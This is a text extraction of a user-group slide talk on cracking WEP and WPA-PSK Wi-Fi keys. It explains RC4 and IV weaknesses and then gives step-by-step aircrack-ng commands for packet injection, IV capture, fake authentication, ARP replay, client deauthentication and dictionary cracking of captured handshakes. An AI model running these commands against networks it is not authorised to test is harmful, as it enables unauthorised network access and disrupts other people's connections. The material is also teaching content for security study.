Cracking Wireless Ryan Curtin LUG@GT Ryan Curtin Cracking - - PowerPoint PPT Presentation

Ryan Curtin Cracking Wireless - p. 1

Cracking Wireless

Ryan Curtin

LUG@GT

» Goals » Setting Up » Checking Injection WEP WPA Questions and Comments? Ryan Curtin Cracking Wireless - p. 2

Goals

By the end of this presentation (if you stay awake), you will:

Understand the different types of wireless keys as well as

their advantages and disadvantages

Understand the legal ramifications of cracking wireless keys Have a basic idea of the theory behind the cracking of each

key type

Know how to use software to crack wireless keys

» Goals » Setting Up » Checking Injection WEP WPA Questions and Comments? Ryan Curtin Cracking Wireless - p. 3

Setting Up

Most of the work can be done with the aircrack-ng package. None of these attacks can be performed if you are using ndiswrapper for your network drivers, or other drivers that do not support promiscuous (or monitor) mode. Starting / stopping promiscuous mode: airmon-ng stop wlan0 airmon-ng check wlan0 airmon-ng start wlan0 <channel>

» Goals » Setting Up » Checking Injection WEP WPA Questions and Comments? Ryan Curtin Cracking Wireless - p. 4

Checking Injection

Before starting, make sure your card can inject packets into an AP! aireplay-ng -9 -e <ESSID> -a <MAC> wlan0 Make sure the percentage of ping replies is not incredibly small, otherwise it may be difficult to collect data.

» Goals » Setting Up » Checking Injection WEP » WEP Encryption » Cracking WEP » Using aircrack-ng » Using aircrack-ng (2) WPA Questions and Comments? Ryan Curtin Cracking Wireless - p. 5

WEP Encryption

The slide title is not redundant! WEP stands for ’wired equivalent privacy’, not ’wireless encryption protocol’.

64-bit or 128-bit keys Uses RC4 stream cipher with CRC-32 checksum Keys have 24-bit IV (initialization vector) 224 (16 million) possible IVs 50% probability of repeated IV after only 5000 packets

» Goals » Setting Up » Checking Injection WEP » WEP Encryption » Cracking WEP » Using aircrack-ng » Using aircrack-ng (2) WPA Questions and Comments? Ryan Curtin Cracking Wireless - p. 6

Cracking WEP

Different methods have been developed:

2001: Fluhrer, Mantin, and Shamir publish WEP flaws and a

passive attack

2005: FBI demonstrates WEP cracking in three minutes 2006: Bittau, Handley, and Lackey show that active attacks

are possible

2007: Pychine, Tews, and Weinmann optimize active attack

(“PTW” attack)

» Goals » Setting Up » Checking Injection WEP » WEP Encryption » Cracking WEP » Using aircrack-ng » Using aircrack-ng (2) WPA Questions and Comments? Ryan Curtin Cracking Wireless - p. 7

Using aircrack-ng

• 1. Gather important data: access point MAC, ESSID, channel

airodump-ng wlan0

• 2. Start capture of IVs

airodump-ng -c <channel> -bssid <MAC> -w <outputfile> wlan0 Leave this running! You want to capture around 50k IVs to ensure success (maybe more)

• 3. Fake authentication with AP

aireplay-ng -1 0 -e <ESSID> -a <MAC> wlan0

» Goals » Setting Up » Checking Injection WEP » WEP Encryption » Cracking WEP » Using aircrack-ng » Using aircrack-ng (2) WPA Questions and Comments? Ryan Curtin Cracking Wireless - p. 8

Using aircrack-ng (2)

4 Reinject ARP packets to get more IVs aireplay-ng -3 -b <MAC> wlan0 Run until you have a substantial number of IVs (in your airodump-ng process) 5 Crack the key! FMS attacks (slow): aircrack-ng -f 1 -F <capture>.cap PTW attacks (fast!): aircrack-ng -P 2 <capture>.cap

» Goals » Setting Up » Checking Injection WEP WPA » WPA Encryption » Cracking WPA-PSK » Using aircrack-ng » Rainbow Tables Questions and Comments? Ryan Curtin Cracking Wireless - p. 9

WPA Encryption

WPA with TKIP appeared as an interim solution to the WEP problem while 802.11i was prepared; 802.11i is WPA2.

WPA: ‘Wi-Fi Protected Access’ TKIP: ‘Temporal Key Integrity Protocol’ TKIP also uses RC4 cipher (for legacy WEP hardware)

Use AES instead if possible!

IV length increased to 48 bits WPA-PSK (pre-shared key): common consumer

environment setup

» Goals » Setting Up » Checking Injection WEP WPA » WPA Encryption » Cracking WPA-PSK » Using aircrack-ng » Rainbow Tables Questions and Comments? Ryan Curtin Cracking Wireless - p. 10

Cracking WPA-PSK

The WPA PSK initialization process is reproducible! Therefore, we must capture a WPA handshake and then try to replicate it.

» Goals » Setting Up » Checking Injection WEP WPA » WPA Encryption » Cracking WPA-PSK » Using aircrack-ng » Rainbow Tables Questions and Comments? Ryan Curtin Cracking Wireless - p. 11

Using aircrack-ng

• 1. Gather important data: access point MAC, ESSID, channel;
• ptional: ESSID of connected client

airodump-ng wlan0

• 2. Start capture of handshakes

airodump-ng -c <channel> -bssid <MAC> -w <outputfile> wlan0 Leave this running! Watch for WPA handshake: xx:xx:xx:xx:xx:xx

• 3. (Optional) Fake deauthentication of client to trigger

handshake aireplay-ng -0 1 -a <AP MAC> -c <client MAC> wlan0 Watch for successful ACK in program output

• 4. Brute-force attack saved handshake

aircrack-ng -w <dictionary> -b <MAC> <output capture>

» Goals » Setting Up » Checking Injection WEP WPA » WPA Encryption » Cracking WPA-PSK » Using aircrack-ng » Rainbow Tables Questions and Comments? Ryan Curtin Cracking Wireless - p. 12

Rainbow Tables

Rainbow Tables: a giant collection of potential common passphrases Available from:

Church of Wifi Rainbow Tables:

http://www.renderlab.net/projects/WPA-tables/

The Schmoo Group: http://rainbowtables.shmoo.com/ Google Search:

http://www.google.com/#q=wpa+rainbow+tables

» Goals » Setting Up » Checking Injection WEP WPA Questions and Comments? » Questions and Comments? Ryan Curtin Cracking Wireless - p. 13

Questions and Comments?